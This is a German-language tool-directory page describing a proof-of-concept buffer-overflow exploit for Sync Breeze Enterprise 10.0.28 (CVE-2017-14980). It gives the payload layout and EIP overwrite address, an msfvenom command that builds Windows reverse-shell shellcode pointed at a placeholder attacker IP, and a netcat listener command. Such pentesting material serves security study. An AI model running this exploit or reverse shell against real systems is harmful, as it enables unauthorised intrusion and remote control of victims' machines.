Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — Proof-of-concept-Exploit für einen Buffer Overflow in Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Sendet eine präparierte HTTP-POST-Nutzlast, um EIP zu überschreiben und benutzerdefinierten x86-Shellcode für die Ausführung beliebigen Codes auszuführen. | Kitploit
Tools/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsBinary-Exploitation
GitHublipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

CVE-2017-14980_syncbreeze_10.0.28_bof

Proof-of-concept-Exploit für einen Buffer Overflow in Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Sendet eine präparierte HTTP-POST-Nutzlast, um EIP zu überschreiben und benutzerdefinierten x86-Shellcode für die Ausführung beliebigen Codes auszuführen.

Repository anzeigen
23vor 1 JahrNoch nicht geprüft
Teilen

Exploit - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

Dieses Repository enthält einen Proof-of-Concept Buffer-Overflow-Exploit (BOF) für Sync Breeze Enterprise Version 10.0.28, der die als CVE-2017-14980 bekannte Sicherheitslücke ausnutzt.

Beschreibung

Die Sicherheitslücke besteht aufgrund einer unzureichenden Eingabevalidierung bei der Verarbeitung des password-Feldes in einer POST-Anfrage an den Endpunkt /login.
Ein Angreifer kann einen übermäßig langen Wert in dieses Feld senden, der das EIP überschreibt und eine beliebige Codeausführung ermöglicht.

Dieser Exploit sendet eine sorgfältig konstruierte Payload, bestehend aus:

  • 520 Bytes Füller ('A')
  • 4 Bytes zum Überschreiben des EIP
  • Ein 20-Byte NOP-Sled
  • Ein Windows-x86-Shellcode, der angepasst werden kann, um beliebige Befehle auszuführen

So funktioniert es

  1. Der Exploit erstellt einen bösartigen Puffer, der den eingebetteten Shellcode enthält.
  2. Er sendet eine HTTP-POST-Anfrage an den verwundbaren Server mit der Payload im -Feld.
password
  • Während der Verarbeitung der Anfrage überschreibt die Anwendung den Instruktionszeiger (EIP) und führt den vom Angreifer bereitgestellten Shellcode aus.
  • Voraussetzungen

    • Ein C-Compiler (z.B. gcc)
    • Netzwerkzugriff auf ein Ziel, auf dem Sync Breeze Enterprise 10.0.28 läuft
    • Anpassung der EIP-Adresse (\x83\x0C\x09\x10) und des Shellcodes falls erforderlich

    Beispiel zur Generierung von Shellcode mit msfvenom:

    root@kitploit:~
    msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
    
    root@kitploit:~
    gcc exploit.c -o exploit
    ./exploit
    
    
    root@kitploit:~
    nc -nlvp 4444
    
    Tool herunterladen